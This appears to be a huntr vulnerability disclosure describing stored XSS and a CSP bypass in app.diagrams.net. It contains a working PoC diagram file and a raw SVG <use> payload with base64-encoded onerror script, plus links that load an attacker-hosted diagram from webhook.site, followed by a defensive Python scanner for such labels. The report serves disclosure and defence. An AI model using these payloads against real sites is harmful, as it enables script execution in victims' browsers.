XSS at app.diagrams.net

huntr report 1F730015-B4D0-4F84-8CAC-9CF1E57A091A

2022-09-06 22:15:28
joaovitormaia
www.huntr.dev
xss vulnerability
bypassing csp
application security

EPSS: 0.001

Percentile: 30.0%

Description

The application lets the SVG “use” tag pass through DOMPurify, which leads to XSS. A strange behaviour bypasses the CSP on app.diagrams.net when there is a “?” before the “#U” import.

Proof of Concept

PoC diagram:

<?xml version="1.0" encoding="UTF-8"?>
<mxfile host="app.diagrams.netxyz" modified="2022-09-06T18:54:56.458Z" agent="5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" etag="xY3UKbpTp-KH--H4WcwT" version="20.2.8">
  <diagram id="4FUsL0c-RG27eG5O0xMg" name="Page-1">
    <mxGraphModel dx="1422" dy="664" grid="1" gridSize="10" guides="1" tooltips="1" connect="1" arrows="1" fold="1" page="1" pageScale="1" pageWidth="827" pageHeight="1169" math="0" shadow="0">
      <root>
        <mxCell id="0" />
        <mxCell id="1" parent="0" />
        <mxCell id="L7LsTOqxvLqq3sj4AYtF-1xyz" value="Text&lt;svg&gt;&lt;use href=&quot;data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoZG9jdW1lbnQuZG9tYWluKSIgLz4KPC9zdmc+#x&quot; /&gt;&lt;/svg&gt;" style="text;html=1;strokeColor=none;fillColor=none;align=center;verticalAlign=middle;whiteSpace=wrap;rounded=0;" vertex="1" parent="1">
          <mxGeometry x="430" y="260" width="60" height="30" as="geometry" />
        </mxCell>
      </root>
    </mxGraphModel>
  </diagram>
</mxfile>

Raw payload:

<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoZG9jdW1lbnQuZG9tYWluKSIgLz4KPC9zdmc+#x" /></svg>
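As an added, defender-side example (not code from the report or from diagrams.net): a Python scanner that walks an mxfile and flags every HTML label that contains an SVG `<use>` element, distinguishing the case the description and payload above describe, where the href is a `data:` URL. It also handles draw.io's compressed `<diagram>` body (base64, then raw deflate, then URL-encoding; that format description is an assumption of this example, not something the report states). The sample mxfile, its cell ids and the base64 body `PLACEHOLDER` are constructed for the example.

```python
import base64
import urllib.parse
import xml.etree.ElementTree as ET
import zlib
from html.parser import HTMLParser

# Constructed sample mxfile (not the report's PoC file): one benign HTML label and
# one label that embeds <svg><use href="data:..."> the way the report describes.
# The base64 body is a placeholder, not the report's payload.
SAMPLE_MXFILE = """<mxfile host="app.diagrams.net" version="20.2.8">
  <diagram id="d1" name="Page-1">
    <mxGraphModel>
      <root>
        <mxCell id="0" />
        <mxCell id="1" parent="0" />
        <mxCell id="benign" value="Hello &lt;b&gt;world&lt;/b&gt;" style="text;html=1;" vertex="1" parent="1" />
        <mxCell id="suspect" value="Text&lt;svg&gt;&lt;use href=&quot;data:image/svg+xml;base64,PLACEHOLDER#x&quot; /&gt;&lt;/svg&gt;" style="text;html=1;" vertex="1" parent="1" />
      </root>
    </mxGraphModel>
  </diagram>
</mxfile>
"""


class UseTagFinder(HTMLParser):
    """Collects the href / xlink:href of every <use> element in an HTML label."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names; <use .../> also lands here
        if tag != "use":
            return
        href = ""
        for name, value in attrs:
            if name in ("href", "xlink:href"):
                href = value or ""
        self.hrefs.append(href)


def scan_label(label):
    """Classify each <use> in one label: 'use-data-href' for data: URLs, else 'use'."""
    finder = UseTagFinder()
    finder.feed(label)
    finder.close()
    findings = []
    for href in finder.hrefs:
        if href.strip().lower().startswith("data:"):
            findings.append("use-data-href")
        else:
            findings.append("use")
    return findings


def decode_compressed_diagram(text):
    """Decode a compressed <diagram> body: base64 -> raw deflate -> URL-decode (assumed format)."""
    raw = zlib.decompress(base64.b64decode(text), -15)
    return urllib.parse.unquote(raw.decode("utf-8"))


def compress_diagram(xml_text):
    """Inverse of decode_compressed_diagram; used here only to build sample input."""
    encoded = urllib.parse.quote(xml_text, safe="~()*!.'").encode("utf-8")
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(encoded) + comp.flush()).decode("ascii")


def scan_mxfile(xml_text):
    """Walk every mxCell of every <diagram> and flag labels that contain <use>."""
    root = ET.fromstring(xml_text)
    results = []
    for diagram in root.iter("diagram"):
        model = diagram.find("mxGraphModel")
        if model is None and diagram.text and diagram.text.strip():
            model = ET.fromstring(decode_compressed_diagram(diagram.text.strip()))
        if model is None:
            continue
        for cell in model.iter("mxCell"):
            value = cell.get("value") or ""
            if "<" not in value:
                continue  # plain-text label: no markup reaches the sanitizer
            for finding in scan_label(value):
                results.append({"diagram": diagram.get("id"),
                                "cell": cell.get("id"),
                                "finding": finding})
    return results


if __name__ == "__main__":
    for hit in scan_mxfile(SAMPLE_MXFILE):
        print(hit)
```

Run it over diagram files at upload or import time and treat any `use-data-href` hit as a blocker; on the sanitizer side, the corresponding hardening is to deny the tag outright (DOMPurify's `FORBID_TAGS` option accepts `use`), since a label with a `data:` href on `<use>` pulls a second, attacker-supplied SVG document into the page.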

PoC links

https://app.diagrams.net/?#Uhttps://webhook.site/d38b94cb-a6ab-4219-b9f3-d34434b76341
https://viewer.diagrams.net/index.html?#Uhttps://webhook.site/d38b94cb-a6ab-4219-b9f3-d34434b76341
